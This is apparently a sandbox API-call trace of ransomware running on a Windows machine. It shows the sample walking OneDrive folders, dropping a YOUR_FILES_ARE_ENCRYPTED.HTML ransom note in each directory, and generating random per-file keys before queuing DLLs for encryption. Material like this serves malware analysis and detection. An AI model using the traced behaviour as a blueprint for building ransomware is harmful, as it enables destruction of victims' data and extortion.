1 [0113.276] CloseHandle (hObject=0x31c) returned 1 [0113.276] GetProcessHeap () returned 0x600000 [0113.276] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.276] GetProcessHeap () returned 0x600000 [0113.276] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0113.277] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2a1d565, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x849e2ad9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x849e2ad9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="17.3.5892.0626_4", cAlternateFileName="177A54~1.062")) returned 1 [0113.277] StrStrIW (lpFirst="17.3.5892.0626_4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.277] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4") returned 75 [0113.277] GetProcessHeap () returned 0x600000 [0113.277] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0113.278] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4" [0113.278] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\*" [0113.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2a1d565, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x849e2ad9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x849e2ad9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName=".", cAlternateFileName="")) returned 0x626778 [0113.278] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2a1d565, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x849e2ad9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x849e2ad9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="..", cAlternateFileName="")) returned 1 [0113.283] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ab7dde1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ab7dde1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3ab7dde1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="af", cAlternateFileName="")) returned 1 [0113.283] StrStrIW (lpFirst="af", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.283] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af") returned 78 [0113.283] GetProcessHeap () returned 0x600000 [0113.283] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.284] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af" [0113.284] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af\\*" [0113.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ab7dde1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ab7dde1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3b11c874, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.285] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ab7dde1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ab7dde1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3b11c874, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="..", cAlternateFileName="")) returned 1 [0113.286] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b11c874, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3b11c874, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3b3f84d0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x158c0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.286] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.286] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.286] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.286] lstrlenW (lpString=".mui") returned 4 [0113.286] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.286] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b11c874, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3b11c874, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3b3f84d0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x158c0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.286] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.286] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.286] GetProcessHeap () returned 0x600000 [0113.286] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\af\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\af\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.287] WriteFile (in: hFile=0x330, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.288] CloseHandle (hObject=0x330) returned 1 [0113.288] GetProcessHeap () returned 0x600000 [0113.288] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.288] GetProcessHeap () returned 0x600000 [0113.288] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.288] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b53a13b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3b53a13b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3b53a13b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="am-et", cAlternateFileName="")) returned 1 [0113.289] StrStrIW (lpFirst="am-et", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.289] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et") returned 81 [0113.289] GetProcessHeap () returned 0x600000 [0113.289] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.290] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et" [0113.290] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et\\*" [0113.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b53a13b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3b53a13b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3beb3411, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.291] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b53a13b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3b53a13b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3beb3411, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="..", cAlternateFileName="")) returned 1 [0113.291] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3beb3411, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3beb3411, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3c1fa809, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.291] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.291] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.291] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.291] lstrlenW (lpString=".mui") returned 4 [0113.291] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.291] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3beb3411, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3beb3411, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3c1fa809, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.291] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.292] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.292] GetProcessHeap () returned 0x600000 [0113.292] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\am-et\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\am-et\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.293] WriteFile (in: hFile=0x330, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.294] CloseHandle (hObject=0x330) returned 1 [0113.294] GetProcessHeap () returned 0x600000 [0113.294] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.294] GetProcessHeap () returned 0x600000 [0113.294] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.295] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c2b9548, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4fa9af2b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4fa9af2b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="amd64", cAlternateFileName="")) returned 1 [0113.295] StrStrIW (lpFirst="amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.295] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64") returned 81 [0113.295] GetProcessHeap () returned 0x600000 [0113.296] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.296] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64" [0113.297] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\*" [0113.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c2b9548, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4fa9af2b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4fa9af2b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.297] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c2b9548, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4fa9af2b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4fa9af2b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="..", cAlternateFileName="")) returned 1 [0113.297] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c993fab, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3c993fab, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3e46677b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x45cc0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="FileSyncApi64.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0113.297] StrStrIW (lpFirst="FileSyncApi64.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.297] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncApi64.dll") returned 99 [0113.297] PathFindExtensionW (pszPath="FileSyncApi64.dll") returned=".dll" [0113.297] lstrlenW (lpString=".dll") returned 4 [0113.297] PathFindExtensionW (pszPath="FileSyncApi64.dll") returned=".dll" [0113.297] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0113.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncApi64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncapi64.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0113.298] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=285888) returned 1 [0113.298] GetProcessHeap () returned 0x600000 [0113.298] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0113.301] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="67") returned 2 [0113.301] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="EB") returned 2 [0113.301] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="8F") returned 2 [0113.301] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="DC") returned 2 [0113.301] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="75") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="1E") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="2D") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="C9") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="3A") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="63") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="63") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="0B") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="30") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="C2") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="F9") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="DD") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="CC") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="F9") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="88") returned 2 [0113.301] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="A9") returned 2 [0113.301] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="18") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="FB") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="73") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="39") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="B0") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="77") returned 2 [0113.301] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="73") returned 2 [0113.301] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="D9") returned 2 [0113.302] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="43") returned 2 [0113.302] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="78") returned 2 [0113.302] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="12") returned 2 [0113.302] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="72") returned 2 [0113.302] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncApi64.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncApi64.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncApi64.dll" [0113.302] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.302] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0113.302] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f15d6eb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3f15d6eb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x439eedd5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x18f6c0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="FileSyncShell64.dll", cAlternateFileName="FILESY~2.DLL")) returned 1 [0113.302] StrStrIW (lpFirst="FileSyncShell64.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.302] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll") returned 101 [0113.302] PathFindExtensionW (pszPath="FileSyncShell64.dll") returned=".dll" 